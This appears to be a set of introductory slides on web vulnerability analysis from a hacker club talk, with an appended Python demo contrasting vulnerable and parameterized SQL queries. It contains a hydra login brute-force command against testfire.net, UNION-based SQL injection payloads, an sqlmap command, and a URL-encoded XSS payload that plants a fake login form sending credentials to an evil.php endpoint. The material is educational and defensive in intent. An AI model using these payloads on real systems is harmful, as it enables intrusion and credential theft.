Hack The Potat0
Introduction to Web Vulnerability Analysis
Organization: Oeste Hacker Club (OHC) http://oestehc.com.br/
Bruno "dropped" Criado, {bruno|dropped}[at]tttruth.com, http://tttruth.com
About me
Freelancer (Sec/Dev)
Security enthusiast for more than 15 years
IT professional for more than 10 years (Infrastructure/Networks/Development)
Founding member of OHC
HTTP/1.1 protocol, RFC 2616
curl -v http://www.pudim.com.br
nc www.pudim.com.br 80
GET / HTTP/1.1
nc oestehc.com.br 80
GET / HTTP/1.1
Methods HTTP/1.1
GET
HEAD
POST
PUT
PATCH
OPTIONS
DELETE
TRACE
CONNECT
Status Code HTTP/1.1
1xx Information
2xx Successful
3xx Redirection
4xx Client Error
5xx Server Error
OWASP Top 10 2013
Most common mistakes
Lack of canonicalization
Client-side-only checks
Security through obscurity
Tools
OWASP ZAP / Burp Suite
wfuzz / dirb / dirbuster
w3af / arachni / Vega
sqlmap
(x)hydra / brutus
HTTP Proxy
Breaking Authentication - (x)hydra
hydra -p naosei -L /usr/share/wordlists/wfuzz/general/common.txt www.testfire.net http-post-form /bank/login.aspx:uid=^USER^&passw=^PASS^&btnSubmit=Login:Please try again
SQL Injection
1. Find the number of columns
   id=1 UNION SELECT 1, 2, 3, ..., X
   id=1 ORDER BY 5, 10, 15
2. Find which column prints information
   id=1 UNION SELECT 1, 2, 3, 4, 5, @@version, 7
   id=1 UNION SELECT 1, 2, 3, 4, 5, @@hostname, 7
   id=1 UNION SELECT 1, 2, 3, 4, 5, current_user(), 7
   id=1 UNION SELECT 1, 2, 3, 4, 5, database(), 7
   id=1 UNION SELECT 1, 2, 3, 4, 5, uuid(), 7
3. Get information about the table
   id=1 UNION SELECT 1, 2, 3, c_name, 4, 5 FROM information_schema.columns
   id=1 UNION SELECT 1, 2, 3, t_name, 4, 5 FROM information_schema.tables
4. Get information about other tables/databases
SQL Injection - sqlmap
sqlmap -u http://www.site.com/page.php?id=2
Cross-Site Scripting (XSS)
Dear user please provide password Username:
Password:
%3Ch1%3EDear+user+please+provide+password+%3Ch1%3E%3Cdiv+background-color%3A%23FF3300%3E%3Cform+action%3D%E2%80%9Dhttp%3A%2F%2F127.0.0.1%2Fevil.php%E2%80%9D%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Duser%E2%80%9D%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Dpass%E2%80%9D%3E%3Cbr%3E%3Cinput+type%3DSUBMIT+value%3D%22login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E
Think about it!
Distrust external data
Data can be forged
Always validate
Prevent and handle errors
Review
Test the security
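To show why the UNION steps in the SQL Injection section work against a query built by string concatenation, and what "Always validate" and "Prevent and handle errors" mean in code, here is an added example that is not part of the slides: a Python stand-in for a page.php?id= backend using an in-memory SQLite database with constructed sample tables (the products/users tables and their columns are assumptions).

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the ?id= backend (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'pudim', 9.9), (2, 'bolo', 12.5);
        CREATE TABLE users (id INTEGER, login TEXT, pwhash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash-placeholder');
    """)
    return conn


def lookup_concat(conn, user_id):
    """VULNERABLE: the external id is spliced into the SQL text, so a value such as
    '1 UNION SELECT ...' or '1 ORDER BY 5' is parsed as SQL (the slides' technique)."""
    sql = "SELECT id, name, price FROM products WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_param(conn, user_id):
    """HARDENED: validate the external value, then bind it as a parameter.
    A bound value travels as data and can never become SQL syntax."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, name, price FROM products WHERE id=?"
    return conn.execute(sql, (int(user_id),)).fetchall()


def probe(lookup, conn, user_id):
    """Run one lookup and return ('rows', rows) or ('error', message), so both
    implementations can be compared on the same input without crashing."""
    try:
        return ("rows", lookup(conn, user_id))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 ORDER BY 5", "1 UNION SELECT 1, 2",
                  "1 UNION SELECT id, login, pwhash FROM users"):
        print(repr(value))
        print("  concat:", probe(lookup_concat, db, value))
        print("  param: ", probe(lookup_param, db, value))
```

The ORDER BY and two-column UNION inputs fail only in the concatenated version, which is exactly the error-based signal used in step 1 to count columns; the parameterized version rejects every non-numeric id before it reaches the database.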